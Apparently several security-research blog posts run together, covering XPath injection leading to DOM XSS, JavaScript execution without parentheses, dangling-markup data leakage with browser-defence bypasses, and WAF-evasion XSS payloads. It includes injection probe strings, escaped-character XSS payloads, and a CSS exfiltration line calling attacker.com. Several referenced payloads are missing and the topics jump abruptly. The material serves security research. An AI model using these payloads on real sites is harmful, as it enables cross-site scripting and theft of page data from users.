Most web apps defend themselves against DOM-based cross-site scripting by validating input before it is written into the DOM. Sometimes, though, a web app requests data from an API and trusts it because it didn't come from the user, so it is never validated. This post shows a trick for tampering with that API-provided data by using XPath injection. Since the data is not validated, you can achieve DOM-based XSS.
This attack can be useful because implementations of XPath 1.0 have a very limited attack surface; more critical attacks only become possible with XPath 2.0 and XPath 3.1. Implementations of XPath 2.0 and 3.1 are not very popular, so most web apps out there use version 1.0.
Since a lot of people don't know XPath very well, I'll cover the basics of how XPath works, which is what you need to know in order to exploit it.
The first step in scanning a web app for XPath injection is to send boolean-based conditions in pairs, one that evaluates to true and one that evaluates to false, such as the following:
/vulnerable_page?id=1' and '1'='1 /vulnerable_page?id=1' and '1'='0
/vulnerable_page?id=1" and "1"="1 /vulnerable_page?id=1" and "1"="0
/vulnerable_page?id=1 and 1=1 /vulnerable_page?id=1 and 1=0
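To see why each pair behaves differently, it helps to picture how the parameter ends up inside the query. The sketch below assumes a hypothetical back end that builds its expression by concatenating id into //item[@id='...']; the query template and the function names buildQuery and probePair are made up for illustration and do not come from any real application.

```javascript
// Hypothetical query template: the application is assumed to build its
// XPath expression by plain string concatenation.
function buildQuery(id) {
  return "//item[@id='" + id + "']";
}

// Build a true/false probe pair for a given quote style ("'", '"' or "").
function probePair(value, quote) {
  const q = quote;
  return {
    whenTrue: `${value}${q} and ${q}1${q}=${q}1`,
    whenFalse: `${value}${q} and ${q}1${q}=${q}0`,
  };
}

const pair = probePair("1", "'");
console.log(buildQuery(pair.whenTrue));  // //item[@id='1' and '1'='1']
console.log(buildQuery(pair.whenFalse)); // //item[@id='1' and '1'='0']
```

If the page renders normally for the first query and differently for the second, the injected condition is being evaluated as part of the expression.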
Restricting the use of parentheses is one of the toughest limitations I have come across, mainly due to the fact that sometimes all sorts of escapes and encodings are blocked.
PortSwigger researcher Gareth Heyes (@garethheyes) even dedicated an entire chapter of his latest book "JavaScript for hackers" to different methods of running JavaScript without parentheses. However, this post is not going to go over Gareth's techniques.
The easiest way to avoid parentheses is to use backticks (grave accents), which call the function as a tagged template:
alert``
However, these are also blocked very often.
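As a minimal sketch of what the backtick form does, the snippet below uses a stand-in function named record (an assumption, used instead of alert so it runs outside a browser) to show that a tagged template is a real function call that needs no parentheses.

```javascript
// A tagged template calls the tag function without any parentheses.
// `record` is a stand-in for alert so the sketch runs outside a browser.
const calls = [];
function record(strings, ...values) {
  calls.push({ strings: [...strings], values });
  return calls.length;
}

record``;          // same call shape as alert``
record`id=${42}`;  // literal parts and interpolated values arrive separately

console.log(calls.length);        // 2
console.log(calls[1].strings[0]); // id=
console.log(calls[1].values[0]);  // 42
```

The function receives an array of string parts as its first argument, which is why alert`` shows an empty dialog rather than a chosen value.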
Another option is to find a way to evaluate a string, so that the parentheses can be escaped and/or encoded inside it. Some functions that do this are:
However, the invocation of such functions needs parentheses as well.
The solution is to use javascript: protocol URLs. These can be assigned to window.location or document.location just like any other value.
The double slash (//) after the javascript: protocol starts a single-line comment that comments out the whole URL up to the %0A after the #. The %0A is decoded into a newline, which breaks out of the single-line comment; the payload then follows and is executed. Because the payload sits in the URL fragment, it never reaches the server, even if the cross-site scripting is server-side.
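The comment-and-newline mechanism can be sketched outside a browser. The URL below is an illustrative assumption (example.com and the report payload are made up), and the decode-then-run steps only approximate how a browser handles a javascript: URL.

```javascript
// Illustrative URL only: example.com and the fragment payload are assumptions.
const url = "javascript://example.com/page#%0Areport(1)";

// Roughly what a browser does with a javascript: URL: drop the scheme,
// percent-decode the rest, and run the result as script.
const source = decodeURIComponent(url.slice("javascript:".length));
const lines = source.split("\n");
console.log(lines[0]); // //example.com/page#  (a single-line comment)
console.log(lines[1]); // report(1)            (the live payload)

// Run it with a stub named `report` in place of alert so the effect is
// observable without a browser.
const seen = [];
new Function("report", source)((value) => seen.push(value));
console.log(seen.length, seen[0]); // 1 1
```

Everything before the decoded newline is ignored as a comment, so only the second line runs.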
Some time ago, whenever script execution was blocked by the Content-Security-Policy, an easy way around it was to perform a dangling markup injection attack. Dangling markup injections are scriptless attacks, an alternative to XSS for exfiltrating information from a web page.
Nowadays, some web browsers such as Google Chrome and Microsoft Edge have built-in security defenses that attempt to block these types of attacks. This blog post will expose three bypasses for these security defenses.
Dangling markup injection attacks are very simple. Imagine a web page that has an HTML injection vulnerability like the following example:
An HTML tag with an unclosed attribute is injected into the page. The unclosed attribute consumes the web page's content until it finds a matching closing quote.
When the request is made the URL will leak the document's content.
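The way an unclosed attribute swallows the rest of the page can be modelled with plain string handling. The page, the attacker.example host, and the danglingAttributeValue helper below are all hypothetical, and the function is a deliberately simplified stand-in for a real HTML parser.

```javascript
// Hypothetical page: the injection point is followed by content worth stealing.
const injection = "<link rel=stylesheet href='http://attacker.example/?log=";
const page =
  "<p>Hello " + injection + "</p>\n" +
  "<input type=hidden name=csrf value=abc123>\n" +
  "<p class='footer'>bye</p>";

// Simplified model of attribute parsing: the value runs from the opening
// quote to the next matching quote, whatever markup lies in between.
function danglingAttributeValue(html, openQuoteIndex) {
  const quote = html[openQuoteIndex];
  const close = html.indexOf(quote, openQuoteIndex + 1);
  return close === -1 ? null : html.slice(openQuoteIndex + 1, close);
}

const openQuote = page.indexOf("href='") + "href=".length;
const leakedUrl = danglingAttributeValue(page, openQuote);
console.log(leakedUrl.includes("abc123")); // true: the token is now part of the URL
```

In this model the attribute value ends at the first single quote that the page itself happens to contain, so everything between the injection and that quote becomes part of the requested URL.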
In this example a <link> tag was used to request a stylesheet from a foreign server, which logs incoming requests and waits for the leaked data to arrive. Any HTML tag that performs an HTTP request will do, such as <img> or <iframe>. HTML is not the only option either: CSS could be used in a scenario where style injection is feasible. CSS functionality such as background-image: url('http://attacker.com/?log= or @import could be used to force the browser to initiate an HTTP request.
There is a GitHub repository named HTTPLeaks that lists the possible ways in which a browser can leak data through HTTP requests.
However, things have changed over time, and most browsers now implement defenses in an attempt to stop these types of attack. Whenever a URL is processed, the parser looks for certain dangerous patterns such as angle brackets < > and new lines (%0A %0D). If this combination of characters is found, the browser blocks the request because it looks as if the document is being leaked through the URL. It is possible to see the blocked request in the dev-tools network panel:
I tested different dangling injections in different browsers. Chrome, Chromium, Edge and Opera do block the exfiltrating request. However, for some reason Firefox (v. 124) does not implement such a defense.
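A rough model of the check described above could look like the following. It is a simplification based only on this description, not Chromium's actual code; the function name looksLikeDanglingMarkup is made up, and only raw newline characters are considered.

```javascript
// Simplified model of the check described in the text, not Chromium's code:
// a URL is treated as suspicious when it contains both a raw newline
// character and an angle bracket.
function looksLikeDanglingMarkup(rawUrl) {
  const hasNewline = /[\r\n]/.test(rawUrl);
  const hasAngleBracket = /[<>]/.test(rawUrl);
  return hasNewline && hasAngleBracket;
}

// Leaked markup typically carries both patterns, so it is flagged.
console.log(looksLikeDanglingMarkup("http://attacker.example/?log=</p>\n<input>")); // true
// An ordinary URL, or one with only one of the two patterns, passes.
console.log(looksLikeDanglingMarkup("http://attacker.example/?log=abc"));           // false
console.log(looksLikeDanglingMarkup("http://attacker.example/?log=<b>"));           // false
```

Because the check needs both patterns at once, a leak that avoids either one would not be flagged by this model.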
Since the dangling injections only work in Firefox, my goal was to find a way to make them work in other browsers too. I found a commit diff in Chromium's source code that illustrates the defense mechanism. Then, after looking some more, I found a security vulnerability report from 2017 that exposes a bypass for the request blocker. I was very lucky because I tested the attack vector in the other browsers and it successfully leaked the data.
I also found 2 more bypasses that work in all major browsers as well:
EDIT: Most of these bypasses have already been patched. While some of the tricks shown in this post can be used to find new bypasses, they will only work on very few WAFs, and other types of techniques should be used to bypass most of them.
At Black Hat 2009 I had the honor of personally meeting @sirdarckcat (Eduardo Vela, leader of Google Project Zero), who gave a presentation titled "Our favorite XSS filters and how to attack them". In his presentation he managed to bypass every single popular Web Application Firewall that was on the market at that time, and he said it had been a piece of cake.
The conclusion of his talk was that all Web Application Firewalls (WAFs) were practically useless at that time due to the tremendous ease with which they could be bypassed.
Now, more than ten years later, I decided to evaluate the security of many popular WAFs to see their evolution and how robust they've become over time. The conclusion is that most of them are still extremely vulnerable. They are very easy to bypass so the degree of protection they offer is very low; I broke each WAF in around 5 minutes.
I decided to publish the bypasses because it is actually funny how bad these filters are.
Several years ago I found a nice feature in JavaScript that lets an attacker break up character sequences in an easy, quick and short way. This is done by escaping characters that do not have an escape sequence assigned. For instance, these are valid escapes in JavaScript:
Those characters are replaced by their corresponding values if you add a backslash before them.
If you put a backslash before any other character, JavaScript simply drops the backslash, so the string is broken up in the source while still preserving its meaning:
window['\a\l\ert'](1)
window['\pr\o\m\pt'](1)
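The behaviour is easy to confirm with a few comparisons. The fakeWindow object below is a stand-in (an assumption) so that the property lookup can be exercised outside a browser.

```javascript
// A backslash before a character with no escape meaning is simply dropped,
// so both spellings produce the same string.
console.log('\a\l\ert' === 'alert');    // true
console.log('\pr\o\m\pt' === 'prompt'); // true

// Characters that do have an escape meaning change the string instead.
console.log('ale\rt' === 'alert');      // false: \r is a carriage return

// Stand-in object so the lookup can be exercised outside a browser.
const fakeWindow = { alert: (x) => `alert called with ${x}` };
console.log(fakeWindow['\a\l\ert'](1)); // alert called with 1
```

This is why the position of each backslash matters: it has to land in front of a character that has no escape meaning of its own.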
Hopefully this will help to speed up the process of evading WAFs.
It is 103 bytes long and it works in one more context than Gareth's: his doesn't work in single-line comment contexts (//), although I find his vector more elegant.
I decided to improve it so that it works in every possible context:
You can also add a ${{7*7}} at the very end to test for template injection as well.
Besides blind XSS, this vector is also good for speeding up the search for regular cross-site scripting vulnerabilities. Instead of having to send 21 requests to each parameter when testing an application, you only have to make 1 request. This gets the job done in approximately 5% of the time.
Can you make it even shorter? Let me know in the comments or through X (@ruben_v_pina).